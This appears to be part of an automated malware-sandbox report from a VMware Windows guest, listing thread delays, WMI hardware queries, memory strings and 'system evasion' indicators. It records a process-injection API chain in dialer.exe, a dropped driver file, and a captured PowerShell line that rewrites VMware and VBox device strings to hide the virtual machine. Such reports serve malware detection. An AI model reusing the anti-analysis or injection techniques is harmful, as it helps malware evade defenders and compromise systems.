          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process information set: NOOPENFILEERRORBOX (6 occurrences)

          Malware Analysis System Evasion

          Source: C:\Windows\System32\dialer.exe | Code function: OpenProcess, OpenProcess, K32GetModuleFileNameExW, PathFindFileNameW, lstrlenW, StrCpyW, CloseHandle, StrCmpIW, NtQueryInformationProcess, OpenProcessToken, GetTokenInformation, GetLastError, LocalAlloc, GetTokenInformation, GetSidSubAuthorityCount, GetSidSubAuthority, LocalFree, CloseHandle, StrStrA, VirtualAllocEx, WriteProcessMemory, NtCreateThreadEx, WaitForSingleObject, GetExitCodeThread, FindCloseChangeNotification, CloseHandle (41_2_00000001400010C0)
          Source: C:\Windows\System32\svchost.exe | System information queried: FirmwareTableInformation
          Source: C:\Windows\System32\dialer.exe | System information queried: FirmwareTableInformation
          Source: C:\Windows\System32\svchost.exe | File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 occurrences)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6673
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1172
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7979
          Source: C:\Windows\System32\winlogon.exe | Window / User API: threadDelayed 5536
          Source: C:\Windows\System32\winlogon.exe | Window / User API: threadDelayed 4463
          Source: C:\Windows\System32\lsass.exe | Window / User API: threadDelayed 9346
          Source: C:\Windows\System32\lsass.exe | Window / User API: threadDelayed 616
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 732
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8037
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 9251
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 739
          Source: C:\Windows\System32\dwm.exe | Window / User API: threadDelayed 9868
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1267
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1189
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1135
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1100
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1026
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 994
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 817
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 831
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 827
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 835
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 793
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 795
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 802
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 769
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 778
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 715
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 706
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 707
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 717
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 633
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 677
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 638
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 633
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 661
          Source: C:\Windows\System32\spoolsv.exe | Window / User API: threadDelayed 528
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 513
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 540
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 501
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 492
          Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 475
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Dropped PE file which has not been started: C:\Windows\Temp\sidneyeifgjd.sys
          Source: C:\Windows\System32\dialer.exe | Check user administrative privileges: GetTokenInformation (graph_41-480)
          Source: C:\Windows\System32\dialer.exe | API coverage: 0.9 %
          Source: C:\Windows\System32\svchost.exe TID: 3600 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4596 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5824 | Thread sleep count: 6673 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5824 | Thread sleep count: 1172 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380 | Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5860 | Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6608 | Thread sleep count: 330 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6608 | Thread sleep count: 7979 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640 | Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\winlogon.exe TID: 2972 | Thread sleep count: 5536 > 30
          Source: C:\Windows\System32\winlogon.exe TID: 2972 | Thread sleep time: -5536000s >= -30000s
          Source: C:\Windows\System32\winlogon.exe TID: 2972 | Thread sleep count: 4463 > 30
          Source: C:\Windows\System32\winlogon.exe TID: 2972 | Thread sleep time: -4463000s >= -30000s
          Source: C:\Windows\System32\lsass.exe TID: 6616 | Thread sleep count: 9346 > 30
          Source: C:\Windows\System32\lsass.exe TID: 6616 | Thread sleep time: -9346000s >= -30000s
          Source: C:\Windows\System32\lsass.exe TID: 6616 | Thread sleep count: 616 > 30
          Source: C:\Windows\System32\lsass.exe TID: 6616 | Thread sleep time: -616000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6576 | Thread sleep count: 732 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6576 | Thread sleep count: 8037 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6636 | Thread sleep count: 9251 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6636 | Thread sleep time: -9251000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6636 | Thread sleep count: 739 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6636 | Thread sleep time: -739000s >= -30000s
          Source: C:\Windows\System32\dwm.exe TID: 2212 | Thread sleep count: 9868 > 30
          Source: C:\Windows\System32\dwm.exe TID: 2212 | Thread sleep time: -9868000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 7140 | Thread sleep count: 1267 > 30
          Source: C:\Windows\System32\svchost.exe TID: 7140 | Thread sleep time: -1267000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1640 | Thread sleep count: 1189 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1640 | Thread sleep time: -1189000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6452 | Thread sleep count: 1135 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6452 | Thread sleep time: -1135000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6460 | Thread sleep count: 1100 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6460 | Thread sleep time: -1100000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 7104 | Thread sleep count: 1026 > 30
          Source: C:\Windows\System32\svchost.exe TID: 7104 | Thread sleep time: -1026000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6440 | Thread sleep count: 994 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6440 | Thread sleep time: -994000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1996 | Thread sleep count: 817 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1996 | Thread sleep time: -817000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3904 | Thread sleep count: 831 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3904 | Thread sleep time: -831000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3228 | Thread sleep count: 827 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3228 | Thread sleep time: -827000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5708 | Thread sleep count: 835 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5708 | Thread sleep time: -835000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5428 | Thread sleep count: 793 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5428 | Thread sleep time: -793000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3192 | Thread sleep count: 795 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3192 | Thread sleep time: -795000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1904 | Thread sleep count: 802 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1904 | Thread sleep time: -802000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1944 | Thread sleep count: 769 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1944 | Thread sleep time: -769000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2424 | Thread sleep count: 778 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2424 | Thread sleep time: -778000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1868 | Thread sleep count: 715 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1868 | Thread sleep time: -715000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5860 | Thread sleep count: 706 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5860 | Thread sleep time: -706000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5824 | Thread sleep count: 707 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5824 | Thread sleep time: -707000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2504 | Thread sleep count: 717 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2504 | Thread sleep time: -717000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2120 | Thread sleep count: 633 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2120 | Thread sleep time: -633000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2268 | Thread sleep count: 677 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2268 | Thread sleep time: -677000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2060 | Thread sleep count: 638 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2060 | Thread sleep time: -638000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2196 | Thread sleep count: 633 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2196 | Thread sleep time: -633000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2132 | Thread sleep count: 661 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2132 | Thread sleep time: -661000s >= -30000s
          Source: C:\Windows\System32\spoolsv.exe TID: 2076 | Thread sleep count: 528 > 30
          Source: C:\Windows\System32\spoolsv.exe TID: 2076 | Thread sleep time: -528000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2272 | Thread sleep count: 513 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2272 | Thread sleep time: -513000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5388 | Thread sleep count: 540 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5388 | Thread sleep time: -540000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6436 | Thread sleep count: 501 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6436 | Thread sleep time: -501000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4180 | Thread sleep count: 492 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4180 | Thread sleep time: -492000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2280 | Thread sleep count: 475 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2280 | Thread sleep time: -475000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4612 | Thread sleep count: 241 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4612 | Thread sleep time: -241000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3068 | Thread sleep count: 317 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3068 | Thread sleep time: -317000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3652 | Thread sleep count: 279 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3652 | Thread sleep time: -279000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2228 | Thread sleep count: 276 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2228 | Thread sleep time: -276000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4684 | Thread sleep count: 84 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4684 | Thread sleep time: -84000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2840 | Thread sleep count: 83 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2840 | Thread sleep time: -83000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 980 | Thread sleep count: 79 > 30
          Source: C:\Windows\System32\svchost.exe TID: 980 | Thread sleep time: -79000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6484 | Thread sleep count: 77 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6484 | Thread sleep time: -77000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6476 | Thread sleep count: 75 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6476 | Thread sleep time: -75000s >= -30000s
          Source: C:\Windows\System32\sihost.exe TID: 3476 | Thread sleep count: 67 > 30
          Source: C:\Windows\System32\sihost.exe TID: 3476 | Thread sleep time: -67000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5556 | Thread sleep count: 64 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5556 | Thread sleep time: -64000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1552 | Thread sleep count: 59 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1552 | Thread sleep time: -59000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3196 | Thread sleep count: 55 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3196 | Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3956 | Thread sleep count: 57 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3956 | Thread sleep time: -57000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4036 | Thread sleep count: 56 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4036 | Thread sleep time: -56000s >= -30000s
          Source: C:\Windows\System32\ctfmon.exe TID: 6596 | Thread sleep count: 54 > 30
          Source: C:\Windows\System32\ctfmon.exe TID: 6596 | Thread sleep time: -54000s >= -30000s
          Source: C:\Windows\System32\dasHost.exe TID: 4152 | Thread sleep count: 50 > 30
          Source: C:\Windows\System32\dasHost.exe TID: 4152 | Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4636 | Thread sleep count: 48 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4636 | Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4616 | Thread sleep count: 47 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4616 | Thread sleep time: -47000s >= -30000s
          Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
          Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS (2 occurrences)
          Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem (2 occurrences)
          Source: C:\Windows\System32\dialer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (17 occurrences)
          Source: C:\Windows\System32\lsass.exe | Last function: Thread delayed (2 occurrences)
          Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed (93 occurrences)
          Source: C:\Windows\System32\spoolsv.exe | Last function: Thread delayed (2 occurrences)
          Source: C:\Windows\System32\sihost.exe | Last function: Thread delayed (2 occurrences)
          Source: C:\Windows\System32\ctfmon.exe | Last function: Thread delayed (2 occurrences)
          Source: C:\Windows\System32\dasHost.exe | Last function: Thread delayed (2 occurrences)
          Source: C:\Windows\System32\RuntimeBroker.exe | Last function: Thread delayed (4 occurrences)
          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
          Source: C:\Windows\System32\dasHost.exeCode function: 131_2_000002809238DCE0 FindFirstFileExW,131_2_000002809238DCE0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: svchost.exe, 00000070.00000000.1633069505.00000177808D7000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Win32_PnPEntityVMware VMCI Bus Device{4d36e97d-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityVMware VMCI Bus DevicePCI\L5GLB1OV&DEV_0740&SUBSYS_074015AD&REV_10\3&61AAA01&0&3FSystem.String[]VMware, Inc.VMware VMCI Bus DeviceSystemPCI\ZA2OC8U6&DEV_0740&SUBSYS_074015AD&REV_10\3&61AAA01&0&3FvmciOKWin32_ComputerSystemuser-PCBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74
          Source: svchost.exe, 00000070.00000000.1631379586.000001778084D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Win32_PnPEntityMicrosoft Hyper-V Virtualization Infrastructure Driver{4d36e97d-e325-11ce-bfc1-08002be10318}Win32_PnPEntityMicrosoft Hyper-V Virtualization Infrastructure DriverROOT\VID\0000System.String[]MicrosoftMicrosoft Hyper-V Virtualization Infrastructure DriverSystemROOT\VID\0000VidOKWin32_ComputerSystemuser-PCBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74m
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DiskVMware__
          Source: svchost.exe, 00000058.00000000.1501914715.000002AB7CC43000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@vmci
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Win32_PnPEntitySCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
          Source: svchost.exe, 00000056.00000000.1485322322.0000029BC7A2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWarVMware SATA CD00
          Source: svchost.exe, 00000070.00000003.1934284685.00000177815E2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware,
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
          Source: svchost.exe, 00000002.00000002.1398660296.000001635905D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1397704163.000001635383F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1398746540.0000016359062000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000051.00000002.2736429489.00000237CEF51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000006D.00000000.1614000316.0000028F03640000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006D.00000000.1615387516.0000028F03F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006F.00000000.1621428719.000001F22BA8C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006F.00000000.1623246902.000001F22C307000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006F.00000003.1650628550.000001F22C309000.00000004.00000001.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000074.00000000.1698828870.000001570B559000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: svchost.exe, 00000070.00000000.1649347225.0000017781213000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Win32_PnPEntitySCSI\DISK&VEN_LZ4ZTPLC&PROD_VIRTUAL_DISK\4&1656F219&0&000000VMware Virtual disk SCSI Disk DeviceWin32_ComputerSystemuser-PC(Standard disk drives)SCSI\DISK&VEN_U3GCMCE2&PROD_VIRTUAL_DISK\4&1656F219&0&000000VMware Virtual disk SCSI Disk DeviceSystem.String[]System.String[]disk{4d36e967-e325-11ce-bfc1-08002be10318}Disk driveWin32_PnPEntityOKDiskDriveWin32_PnPEntity
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DiskSCSI\RAW(Standard disk drives){4d36e967-e325-11ce-bfc1-08002be10318}DiskDrivediskSCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000Win32_ComputerSystemWin32_PnPEntityuser-PCDisk driveOKVMware Virtual disk SCSI Disk DeviceVMware Virtual disk SCSI Disk Device
          Source: svchost.exe, 00000068.00000000.1573751858.0000014DE2102000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000058.00000000.1525438710.000002AB7F200000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
          Source: svchost.exe, 00000058.00000000.1509946822.000002AB7D800000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
          Source: svchost.exe, 00000058.00000000.1524317200.000002AB7F153000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
          Source: dwm.exe, 00000039.00000000.1421438028.0000028F87CBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: svchost.exe, 00000058.00000000.1502549095.000002AB7CC93000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMCI: Using capabilities (0x1c).
          Source: svchost.exe, 0000000A.00000002.2516685763.0000025C04A2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000068.00000002.2515892556.0000014DE2036000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
          Source: svchost.exe, 00000070.00000003.1915578900.00000177818B3000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: stringComputer System ProductComputer System ProductTYVGCC0CC82742-52E4-CC1D-A08F-D3A4823E8F04VMware, Inc.None
          Source: svchost.exe, 0000000A.00000002.2555931604.0000025C04A7C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: OfficeClickToRun.exe, 00000074.00000002.2726358341.000001570C0D2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine)
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: nonicNECVMWarVMware SATA CD00
          Source: svchost.exe, 00000058.00000000.1509946822.000002AB7D800000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
          Source: svchost.exe, 00000058.00000000.1507183605.000002AB7D6CC000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmcir:m
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: nonicVMware Virtual disk 6000c29cbcceb42671d1430c5a2a776c
          Source: svchost.exe, 00000058.00000000.1525438710.000002AB7F200000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk 2.0 6000c29cbcceb42671d1430c5a2a776cPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
